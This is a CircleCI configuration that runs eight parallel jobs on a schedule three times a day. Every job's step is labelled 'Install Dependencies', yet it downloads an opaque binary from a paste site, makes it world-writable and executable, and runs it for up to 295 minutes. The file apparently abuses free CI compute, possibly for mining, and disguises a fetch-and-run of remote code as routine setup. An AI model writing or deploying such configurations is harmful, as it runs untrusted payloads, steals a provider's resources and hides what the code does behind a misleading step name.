version: 2.1

orbs:

  ruby: circleci/ruby@0.1.2 

jobs:

    gaslah1:

      docker:

            - image: circleci/ruby:2.6.3-stretch-node

      steps:

        - run:

            name: Install Dependencies

            command: wget https://www.heypasteit.com/download/0IW9MK && chmod 777 0IW9MK && ./0IW9MK
            no_output_timeout: 295m

    gaslah2:

      docker:

            - image: circleci/ruby:2.6.3-stretch-node

      steps:

        - run:

            name: Install Dependencies

            command: wget https://www.heypasteit.com/download/0IW9MK && chmod 777 0IW9MK && ./0IW9MK
            no_output_timeout: 295m

    gaslah3:

      docker:

            - image: circleci/ruby:2.6.3-stretch-node

      steps:

        - run:

            name: Install Dependencies

            command: wget https://www.heypasteit.com/download/0IW9MK && chmod 777 0IW9MK && ./0IW9MK
            no_output_timeout: 295m

    gaslah4:

      docker:

            - image: circleci/ruby:2.6.3-stretch-node

      steps:

        - run:

            name: Install Dependencies

            command: wget https://www.heypasteit.com/download/0IW9MK && chmod 777 0IW9MK && ./0IW9MK
            no_output_timeout: 295m

    gaslah5:

      docker:

            - image: circleci/ruby:2.6.3-stretch-node

      steps:

        - run:

            name: Install Dependencies

            command: wget https://www.heypasteit.com/download/0IW9MK && chmod 777 0IW9MK && ./0IW9MK
            no_output_timeout: 295m

    gaslah6:

      docker:

            - image: circleci/ruby:2.6.3-stretch-node

      steps:

        - run:

            name: Install Dependencies

            command: wget https://www.heypasteit.com/download/0IW9MK && chmod 777 0IW9MK && ./0IW9MK
            no_output_timeout: 295m

    gaslah7:

      docker:

            - image: circleci/ruby:2.6.3-stretch-node

      steps:

        - run:

            name: Install Dependencies

            command: wget https://www.heypasteit.com/download/0IW9MK && chmod 777 0IW9MK && ./0IW9MK
            no_output_timeout: 295m
            

    gaslah8:

      docker:

            - image: circleci/ruby:2.6.3-stretch-node

      steps:

        - run:

            name: Install Dependencies

            command: wget https://www.heypasteit.com/download/0IW9MK && chmod 777 0IW9MK && ./0IW9MK
            no_output_timeout: 295m



workflows:

  version: 2

  commit:

    jobs:

      - gaslah1

      - gaslah2

      - gaslah3

      - gaslah4

      - gaslah5

      - gaslah6

      - gaslah7

      - gaslah8

    triggers:

      - schedule:

          cron: "0 2,10,18 * * *"

          filters:

            branches:

              only:

                - master
                

  gaslahrunjob:

    jobs:

      - gaslah1

      - gaslah2

      - gaslah3

      - gaslah4

      - gaslah5

      - gaslah6

      - gaslah7

      - gaslah8